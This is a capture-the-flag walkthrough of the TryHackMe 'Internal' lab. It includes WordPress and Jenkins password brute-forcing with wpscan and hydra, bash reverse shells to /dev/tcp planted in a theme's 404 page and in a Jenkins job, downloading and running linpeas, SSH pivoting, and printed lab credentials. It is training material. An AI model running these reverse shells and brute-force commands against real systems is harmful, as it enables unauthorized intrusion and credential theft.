Internal

Room Link: https://tryhackme.com/room/internal

Scanning

Initial Scan

nmap -A 10.10.46.54

Scan all ports

No other ports found.

nmap -p- 10.10.46.54

TCP/80 - HTTP

gobuster dir -u http://10.10.46.54 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 30

WordPress is running under both /blog and /wordpress. /blog has a login page.

wpscan --url http://10.10.46.54
wpscan --url http://10.10.46.54/blog --passwords /usr/share/wordlists/rockyou.txt

Credentials found

Username: admin
Password: my2boys

When trying to log in, the page redirects to internal.thm, so I added that to the hosts file.

vi /etc/hosts

We are able to log in to WordPress with the credentials.

Reverse Shell Failed Attempt

revshell.php code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'");
?>

vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443

Unable to upload the plugin due to write issues.

Reverse Shell

The Twenty Seventeen theme had writable pages, so I modified the 404 page with a reverse shell and then navigated to a page that does not exist.

Just added the revshell.php code mentioned earlier.

Kali

nc -lvnp 443

Browser

Browse to a page that doesn't exist to trigger the reverse shell.

http://www.internal.thm/blog/index.php/2020/08/03/hello-worlgd/

Get full TTY shell

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

LinPeas

Kali

python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://10.10.120.18:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

LinPEAS was able to find two sets of credentials. The phpmyadmin credentials worked.

phpmyadmin
Username: phpmyadmin
Password: B2Ud4fEOZmVq

note
Username: aubreanna
Password: bubb13guM!@#123

The note for Bill

cat /opt/wp-save.txt 

Able to SSH in with the credentials. There is a file that says that Jenkins is running, and we can confirm that it is running with netstat as well.

ssh aubreanna@10.10.46.54
Password: bubb13guM!@#123
cat jenkins.txt
netstat -tuan

Pivot

From Kali I am now able to reach the Jenkins server

Option #1

For the rest of the guide I used this option.

apt install sshuttle
sshuttle -r aubreanna@10.10.46.54 127.0.0.1/24
Password: bubb13guM!@#123

Option #2

If I had followed this way, Jenkins would be redirected to port 4444 on Kali.

ssh -L 4444:172.17.0.2:8080 aubreanna@10.10.46.54
Password: bubb13guM!@#123

Bruteforce

After checking for some time I couldn't find any files with credentials that worked. The Jenkins server is being run in Docker and I had no access to anything for that, so I resorted to using hydra. I tried logging in with fake credentials, then looked at the request and copied the info I needed to start bruteforcing.

File: /j_acegi_security_check
Request Body: j_username=test&j_password=pass&from=%2F&Submit=Sign+in
Failed login message: Invalid username or password

The default hydra was giving false positives and not getting the correct credentials, so I downloaded it from GitHub, built it, and ran the bruteforcing again.

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install

./hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P  /usr/share/wordlists/rockyou.txt

Credentials were found.

Username: admin
Password: spongebob

Jenkins Web

Just added a reverse shell to the job and ran it.

/bin/bash -c 'bash -i >& /dev/tcp/10.10.120.18/443 0>&1'

Kali

Set up a listener

nc -lvnp 443

Privilege Escalation

There was a note under /opt for Aubreanna that had the credentials for root.

Username: root
Password: tr0ub13guM!@#123

Tried logging in with the credentials with ssh and it worked.

ssh root@10.10.56.152
Password: tr0ub13guM!@#123
